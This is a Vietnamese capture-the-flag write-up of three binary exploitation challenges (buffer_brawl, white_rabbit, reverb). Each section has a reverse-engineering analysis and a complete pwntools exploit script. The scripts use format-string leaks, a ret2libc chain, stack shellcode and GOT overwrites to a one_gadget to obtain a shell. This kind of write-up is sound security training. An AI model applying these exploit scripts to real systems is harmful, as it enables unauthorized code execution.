- ở giải này mình giải được 3 bài , 1 bài beginers và 2 bài tag pwn , cũng coi như là thành công đối với mình vì bài thứ 3 gây khá nhiều khó khăn (do hướng đi củ chuối của mình :>> )
## buffer_brawl
bài này được cho file libc sẵn , tuy nhiên khi link libc vào file đề cho thì mất đến 15p mới xong :)))
checksec :
full giáp

reverse :
có 5 option ở đây , ta sẽ đi qua từng option

option1 jab :
mỗi lần gọi option này nó sẽ trừ giá trị của biến global ```stack_life_points``` 1 đơn vị

giá trị của biến global này là 0x64 -> 100

ngoài ra nó cũng gọi đến hàm này :
ta thấy được nếu biến global này =13 thì ta sẽ nhảy vào 1 đoạn có bug BOF , và có lẽ đây cũng là target của bài

option2 hook :
nó giống với option1 , chỉ khác là lần này nó sẽ trừ đi 2

option3 uppercut :
option này cũng tương tự 2 option trước , nó sẽ trừ 3 với biến global của ta và cũng gọi hàm ```stack_check_up```

option 4 ```slip``` :
read 29 byte vào v1[40] và tiếp theo là xuất hiện bug fsb -> ta có thể leak được mọi thứ (canary,exe,libc) và cũng bypass được các biện pháp bảo vệ(PIE,ASLR,CANARY)

option5 `TKO` :
1 hàm rác không cần quan tâm

EXPLOIT :
- target của bài này khá rõ ràng , chỉ cần làm biến global từ 100 thành 13 thì ta có thể sử dụng bug BOF -> ret2libc để get_shell
- muốn biến ```stack_life_points``` này về giá trị 13 thì có khá nhiều cách , ta có thể gọi option3 (option này trừ biến global đi 3 đơn vị) , tuy nhiên ta sẽ đi 1 cách dễ hơn vì cách đầu phải gọi hàm đó khá nhiều lần , ta sẽ sử dụng option4 , option này có bug fsb -> ta có thể thay đổi giá trị của bất kì địa chỉ nào
- ta cần chú ý là khi thay đổi giá trị thì đi vào 1 trong 3 option đầu thì nó sẽ trừ thêm tương ứng là (1,2,3) nên cần thay đổi giá trị sao cho hợp lý , nếu gọi option1 thì ```stack_check_up``` phải là 14 , option2 thì ```stack_check_up``` là 15 và option3 thì ```stack_check_up``` phải được thay đổi là 16
- ta cũng cần leak libc + canary để có thể ret2libc
script :
```python
#!/usr/bin/python3
from pwn import *
context.binary = exe = ELF('./buffer_brawl_patched')
libc = ELF('./libc6_2.35-0ubuntu3.8_amd64.so')
#p = process()
p = remote('buffer-brawl.chal.wwctf.com',1337)
#gdb.attach(p,gdbscript='''
# b*slip+51
# brva 0x00000000000013F8
# brva 0x0000000000001464
# ''')
target = 0x0000000000004010
p.sendlineafter(b'> ',b'4')
#####leak exe and canary######
p.send('%13$p|%27$p|')
p.recvuntil(b'left?')
p.recvline()
exe_leak = int(p.recvuntil(b'|')[:-1],16)
canary = int(p.recvuntil(b'|')[:-1],16)
log.info(f"exe leak {hex(exe_leak)}")
log.info(f"canary: {hex(canary)}")
exe.address = exe_leak - 0x1747
log.info(f"exe = {hex(exe.address)}")
#######leak libc##########
p.sendlineafter(b'> ',b'4')
payload = b'%7$saaaa'
payload += p64(exe.got.puts)
p.send(payload)
p.recvuntil(b'Right or left?')
p.recvline()
leak_libc = u64(p.recv(6).ljust(8,b'\x00'))
libc.address = leak_libc - libc.sym.puts
log.info(f"leak libc {hex(leak_libc)}")
log.info(f"leak libc: {hex(libc.address)}")
pop_rdi = 0x000000000002a3e5 + libc.address
####change value of target = 16 ######
p.sendlineafter(b'> ',b'4')
p.send(b'%16c%8$hhnaaaaaa' + p64(target + exe.address))
input()
p.sendlineafter(b'> ',b'3')
p.sendlineafter(b'Enter your move: ',b'a'*24 + p64(canary) + p64(0) + p64(pop_rdi) + p64(next(libc.search('/bin/sh\x00')))+ p64(pop_rdi+1) + p64(libc.sym.system))
p.interactive()
```
sever đóng ròi :

## white_rabbit
bài này khá đơn giản nên sẽ nói nhanh
checksec
NT TẮT -> có thể dùng shellcode , tuy nhiên PIE lại bật , ta cần phân tích xem có thể leak được gì không

reverse :
- được tặng địa chỉ hàm main luôn , ngon =)))

- follow :
có bug BOF luôn , và ta cũng có thể bypass được PIE

EXPLOIT :
hướng khai thác của bài này khá rõ ràng , NX tắt -> có địa chỉ binary -> ta sẽ dùng shellcode ở bài này
dữ liệu sẽ được nhập ở RAX -> ta sẽ kiếm các gadget liên quan đến RAX như `call jump`

có cả 2 nên dùng cái nào cũng được :

script :
```python
#!/usr/bin/python3
from pwn import *
context.binary = exe = ELF('./white_rabbit')
p = remote('whiterabbit.chal.wwctf.com', 1337)
shellcode = asm(shellcraft.sh())
shellcode = shellcode.ljust(120,b'\x90')
p.recvuntil(b'> ')
leak = int(p.recvline()[:-1],16)
print(hex(leak))
exe.address = leak - exe.sym.main
print(hex(exe.address))
input()
p.sendline(shellcode + p64(0x00000000000010bf+exe.address))
p.interactive()
```
## reverb
checksec :
Partial RELRO -> có thể overwrite GOT

reverse :
ta sẽ chú ý đến đoạn trong hàm while , ta được nhập 384 byte vào ```s``` và sẽ không có BOF ở đoạn này , tuy nhiên khi nhìn đoạn tiếp theo thì ta thấy được có 1 bug fsb -> có thể leak canary , libc (bài này không có PIE nên không cần leak địa chỉ binary)

phân tích hàm check thử :

- đầu tiên có 1 hàm while duyệt 384 lần (có lẽ là size mà ta có thể nhập vào)
- tiếp theo là nó kiếm tra kí tự đầu tiên có phải là kí tự "%" không , nếu có thì nó sẽ đi tiếp flow ctrinh , không thì nó sẽ tăng v2 lên 1 đơn vị

- tiép theo nó check xem sau kí tự % có phải là kí tự '0' không , nếu phải thì return
- tiếp theo nữa là nếu như kí tự đó là từ 1 đến 9 thì nó sẽ thêm vào 1 mảng 8 byte nptr
check các kí tự ascii ta sẽ biết được > '/' là 0 và 0 sẽ bị loại khỏi trường hợp này


tiếp nữa là nó check xem mảng kí tự đó có <=1 không , nếu có thì return0 , đoạn này có thể hiểu là nó check xem sau kí tự '%' thì có 2 chữ số ở sau không

đoạn cuối cùng là nó sẽ chuyển đổi chuỗi trong nptr thành int và check xem có lớn hơn 57 không , nếu lớn hơn thì cũng return 0
- tóm tắt : đơn giản là nó sẽ check xem có số nào sau kí tự "%" không , các số được cho phép là từ 1-57
- hàm check này sẽ giới hạn ta thay đổi giá trị của 1 địa chỉ nào đó (vd như địa chỉ GOT) và nó cũng giới hạn offset mà ta có thể leak trong stack
vì GOT chỉ là 1 phần nên mình nghĩ ngay đến overwrite GOT , và tất nhiên cũng cần bypass đoạn check , lúc bypass sẽ khá khó nhằn =)))
### EXPLOIT
- đầu tiên chắc chắn là mình sẽ leak địa chỉ libc trước , tiếp theo nữa là mình sẽ check xem địa chỉ got và địa chỉ system nó khác nhau bao nhiêu byte , ở đây ta thấy được tối đa là 12bit

tuy nhiên nếu ghi giá trị bằng system thì cần setup lại tham số , ta có thể điều khiển được tham số của printf , tuy nhiên sau khi sử dụng bug này xong thì nó sẽ quay lại và sử dụng printf khá nhiều nên có thể gặp lỗi nên mình chuyển sang dùng one_gadget
- ta sẽ ghi từng byte một vì nếu ghi 2 byte 1 lúc thì hàm check sẽ chặn điều này , và cũng cần bruteforce
- vì 1 byte cuối của one_gadget sẽ không thay đổi -> ta có thể lấy byte này làm chuẩn để bruteforce , setup logic sau cho chính xác
- script mình dùng thì giá trị 67 (0x43) sẽ luôn giữ , nhưng vì giá trị cho phép <57 nên ta phải trừ nó đi và setup sau cho hợp lý
vd : từng byte sẽ là thế này thì ta phải setup sau cho số byte nó ghi được phải bé hơn 57 và thằng tiếp theo trừ đi thằng kế tiếp cũng phải <57

nói chung cách này khá củ chuối và tốn time nên khuyến khích không làm theo
- ta sử dụng hàm sorted để nó có thể lấy các giá trị hợp lý từ bé đến cao
script :
```python
#!/usr/bin/env python3
from pwn import *
exe = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = exe
p = process()
#p = remote('reverb.chal.wwctf.com', 1337)
#gdb.attach(p,gdbscript='''
# b*0x0000000000401484
# ''')
payload = b'%11$saaa'
payload += p64(exe.got.printf)
p.sendline(payload)
p.recvuntil(b'>> ')
printf_ = u64(p.recv(6).ljust(8,b'\x00'))
libc.address = printf_ - libc.sym.printf
print("libc: " + hex(libc.address))
one_gadget = 0xebd43 + libc.address
system_1 = one_gadget & 0xff
system_2 = one_gadget >> 8 & 0xff
system_3 = one_gadget >> 16 & 0xff
package = {
system_1: exe.got.printf,
system_2: exe.got.printf+1,
system_3: exe.got.printf+2,
}
sort = sorted(package)
print(sort)
print(sort[1]-sort[0])
print(sort[2]-sort[0]-sort[1])
log.info(f"system: {hex(one_gadget)}")
if(sort[0] == 67):
temp = sort[0] - 20
if(sort[1]-sort[0] > 50):
temp1 = sort[1] - 30
payload = f"%20c%{temp}c%16$hhn".encode()
payload += f"%30c%{temp1-sort[0]}c%17$hhn".encode()
payload += f"%{sort[2]-sort[1]}c%18$hhn".encode()
payload = payload.ljust(48,b'a')
payload += flat(
package[sort[0]],
package[sort[1]],
package[sort[2]],
)
input()
p.sendlineafter(b'>> ',payload)
p.interactive()
```
mình mất tầm 6 lần để get_shell :v
